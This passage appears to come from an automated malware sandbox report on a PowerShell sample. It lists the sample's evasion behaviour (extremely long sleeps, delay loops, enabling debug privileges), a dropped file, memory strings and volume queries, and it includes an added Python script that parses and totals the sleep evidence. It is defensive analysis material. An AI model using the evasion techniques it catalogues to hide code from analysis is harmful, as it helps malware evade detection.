Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5376 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\temp54685 Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2524 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1102 Jump to behavior
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 4838 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Add-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdGC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdBC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd>C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdKC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.psm1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VMNetworkAdapterTeamMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Connect-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Add-VMNetworkAdapterExtendedAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdFC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterTeamMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.cdxml
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterIsolation
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Test-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VMNetworkAdapterRdma
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.psd1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdOC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Rename-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: 2.0.0.0\Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdGC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VMNetworkAdapterIsolation
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd)Set-VMNetworkAdapterFailoverConfiguration
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterVlan
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdIC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Remove-VMNetworkAdapterAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.ni
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Add-VMScsiController
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VmNetworkAdapterIsolation
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdHC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.ni.dll
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMScsiController
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd(Set-VmNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.563126115.00000000088CE000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterRdma
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd(Set-VMNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd(Get-VMNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VMNetworkAdapterVlan
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdBC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VmNetworkAdapterIsolation
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdGC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Disconnect-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd+Remove-VMNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd)Get-VMNetworkAdapterFailoverConfiguration
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd(Add-VmNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd"Remove-VMNetworkAdapterExtendedAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd(Add-VMNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Add-VMNetworkAdapterAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdFC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Remove-VMScsiController
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd<C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\*
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd"Remove-VMNetworkAdapterTeamMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V8^
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdJC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Remove-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.xaml
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.dll
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterExtendedAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: 1.1\Hyper-V
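The sleep and delay figures above are hard to read at a glance: a "sleep time" of -1844674407370954s and a "delay time" of 922337203685477 are not realistic waits but the kind of values that appear when a delay is requested with an essentially unbounded interval. The following Python is an added example, not part of the Joe Sandbox report, that normalises these evidence lines into seconds and reproduces the report's own ">= 3 min" long-sleep threshold. It assumes that "Thread sleep time" is reported in seconds (with the sign only reflecting the relative-interval convention of the underlying API, so the magnitude is the duration), that "delay time" is reported in milliseconds, and that "threadDelayed N" is a call count; the six input lines are copied from this section and are the only constructed input.

```python
import re
from dataclasses import dataclass
from typing import Optional

# The report's own threshold for its "Contains long sleeps (>= 3 min)" signature.
LONG_SLEEP_SECONDS = 180

# Constructed input: the six sleep/delay evidence lines copied from the
# "Malware Analysis System Evasion" section of this report.
REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5376 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2524 Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1102 Jump to behavior",
    r"Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 4838 Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior",
]

SOURCE_RE = re.compile(r"^Source:\s+(\S+)")
SLEEP_RE = re.compile(r"Thread sleep time:\s+(-?\d+)s")
DELAY_RE = re.compile(r"Thread delayed: delay time:\s+(-?\d+)")
COUNT_RE = re.compile(r"threadDelayed\s+(\d+)")


@dataclass
class Finding:
    process: str    # image path taken from the "Source:" prefix
    kind: str       # "sleep" (seconds), "delay" (milliseconds) or "delay_count"
    seconds: float  # normalised wall-clock duration; 0 for delay_count
    count: int      # number of delay calls; 1 for a single sleep/delay event
    is_long: bool   # meets the report's >= 3 min threshold


def parse_line(line: str) -> Optional[Finding]:
    """Turn one evidence line into a Finding, or None if it is not a sleep/delay line."""
    src = SOURCE_RE.match(line)
    process = src.group(1) if src else "?"

    m = SLEEP_RE.search(line)
    if m:
        # Assumption: reported in seconds; a negative value means a relative
        # interval, so only the magnitude is meaningful.
        secs = float(abs(int(m.group(1))))
        return Finding(process, "sleep", secs, 1, secs >= LONG_SLEEP_SECONDS)

    m = DELAY_RE.search(line)
    if m:
        # Assumption: reported in milliseconds.
        secs = abs(int(m.group(1))) / 1000.0
        return Finding(process, "delay", secs, 1, secs >= LONG_SLEEP_SECONDS)

    m = COUNT_RE.search(line)
    if m:
        # A loop of short delays is evidence of a different evasion pattern
        # (many calls) than one huge sleep, so it is tracked as a count.
        return Finding(process, "delay_count", 0.0, int(m.group(1)), False)

    return None


def summarise(lines):
    """Aggregate the sleep evidence of a report section into a few headline numbers."""
    findings = [f for f in (parse_line(ln) for ln in lines) if f is not None]
    return {
        "long_sleep_events": sum(1 for f in findings if f.is_long),
        "max_sleep_seconds": max((f.seconds for f in findings), default=0.0),
        "delay_call_count": sum(f.count for f in findings if f.kind == "delay_count"),
        "processes": sorted({f.process for f in findings}),
    }


def describe(seconds: float) -> str:
    """Render a duration in the largest sensible unit (years, for values like these)."""
    year = 365.25 * 24 * 3600
    if seconds >= year:
        return f"{seconds / year:,.0f} years"
    if seconds >= 3600:
        return f"{seconds / 3600:.1f} h"
    return f"{seconds:.0f} s"


if __name__ == "__main__":
    s = summarise(REPORT_LINES)
    print(f"long sleeps: {s['long_sleep_events']}, longest: {describe(s['max_sleep_seconds'])}, "
          f"delay calls in loops: {s['delay_call_count']}, processes: {s['processes']}")
```

Run as a script it reports three long-sleep events, a longest sleep of tens of millions of years, and 8464 looped delay calls across powershell.exe and conhost.exe; the same three regexes can be pointed at any exported Joe Sandbox behaviour text to compare sleep patterns across samples.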

Anti Debugging:

Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior (identical line repeated 3 times in the original report)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior (identical line repeated 3 times in the original report)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior (identical line repeated 3 times in the original report)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior (identical line repeated 2 times in the original report)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior (identical line repeated 3 times in the original report)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior